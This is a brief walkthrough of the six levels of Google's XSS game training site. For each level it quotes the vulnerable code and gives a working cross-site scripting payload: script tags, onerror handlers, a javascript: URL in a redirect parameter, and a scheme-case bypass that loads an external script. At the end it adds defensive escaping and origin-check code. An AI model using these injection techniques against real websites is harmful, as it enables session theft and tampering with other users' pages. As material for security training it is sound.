[1/6] Level 1: Hello, world of XSS
bug:
    message = "Sorry, no results were found for <b>" + query + "</b>."
    message += " <a href='?'>Try again</a>."
    # Display the results page
    self.render_string(page_header + message + page_footer)
exp: <script>alert(/xss/)</script>
[2/6] Level 2: Persistence is key
bug:
    html += "<blockquote>" + posts[i].message + "</blockquote";
    ......
    var message = document.getElementById('post-content').value;
exp: <img src=1 onerror="alert(/xss/)">
[3/6] Level 3: That sinking feeling…
bug:
    html += "<img src='/static/level3/cloud" + num + ".jpg' />";
exp: https://xss-game.appspot.com/level3/frame#2xss' onerror="alert(/xss/)"
[4/6] Level 4: Context matters
bug:
    <img src="/static/loading.gif" onload="startTimer('{{ timer }}');" />
[5/6] Level 5: Breaking protocol
bug: https://xss-game.appspot.com/level5/frame/signup?next=confirm
    <a href="{{ next }}">Next >></a>
We can change the 'next' parameter, which is written into the href unchecked.
exp: https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert(/xss/)
Then click Go and enter anything in the email field.
[6/6] Level 6: Follow the 🐇
bug: if (url.match(/^https?:\/\//)) {
bypass: t-T (the regex is case-sensitive, so changing the case of the scheme gets past it)
    scriptEl.src = url;
    // Show log messages
    scriptEl.onload = function() {
      setInnerText(document.getElementById("log"), "Loaded gadget from " + url);
    ......
    // Take the value after # and use it as the gadget filename.
    function getGadgetName() {
      return window.location.hash.substr(1) || "/static/gadget.js";
    }
    includeGadget(getGadgetName());
We can change the URL fragment so the page includes our own script.
exp:https://xss-game.appspot.com/level6/frame#hTTps://www.google.com/jsapi?callback=alert
(If you use http, the page reports "Couldn't load gadget from ......", because the game page is served over https and the browser blocks a plain-http script as mixed content, so the included script must also come from an https site. I think this is very sly.)
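As an added defensive counterpart (not code from the XSS game or from this writeup), the following JavaScript shows how each bug above is fixed: HTML-encoding the untrusted text for levels 1 to 3, a same-origin check on the level 5 next parameter, and a parsed-URL check for the level 6 gadget loader that is not fooled by scheme case. SITE_ORIGIN is an assumption based on the game's host.

```javascript
// Assumed site origin for the checks below (the game is served from xss-game.appspot.com).
const SITE_ORIGIN = "https://xss-game.appspot.com";

// Levels 1-3: untrusted text lands inside an HTML body or attribute value, so
// encode the five characters that can change context instead of concatenating
// raw input into markup.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Level 5: a redirect target should only ever be a same-origin page. Parsing with
// URL() normalises scheme case and surrounding whitespace, so "javascript:" cannot
// slip through as "JavaScript:" and a protocol-relative "//evil.example" is caught too.
function isSafeNextUrl(next) {
  let u;
  try { u = new URL(next, SITE_ORIGIN); } catch (e) { return false; }
  return u.origin === SITE_ORIGIN; // rejects javascript:, data:, and foreign hosts
}

// Level 6: the original check was a case-sensitive regex on the scheme, which
// "hTTps://" bypasses. Compare the parsed (lowercased) protocol and pin the host
// to the site's own origin rather than accepting any https:// URL at all.
function isAllowedGadgetUrl(url) {
  let u;
  try { u = new URL(url, SITE_ORIGIN); } catch (e) { return false; }
  return u.protocol === "https:" && u.origin === SITE_ORIGIN;
}
```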
Easter egg:
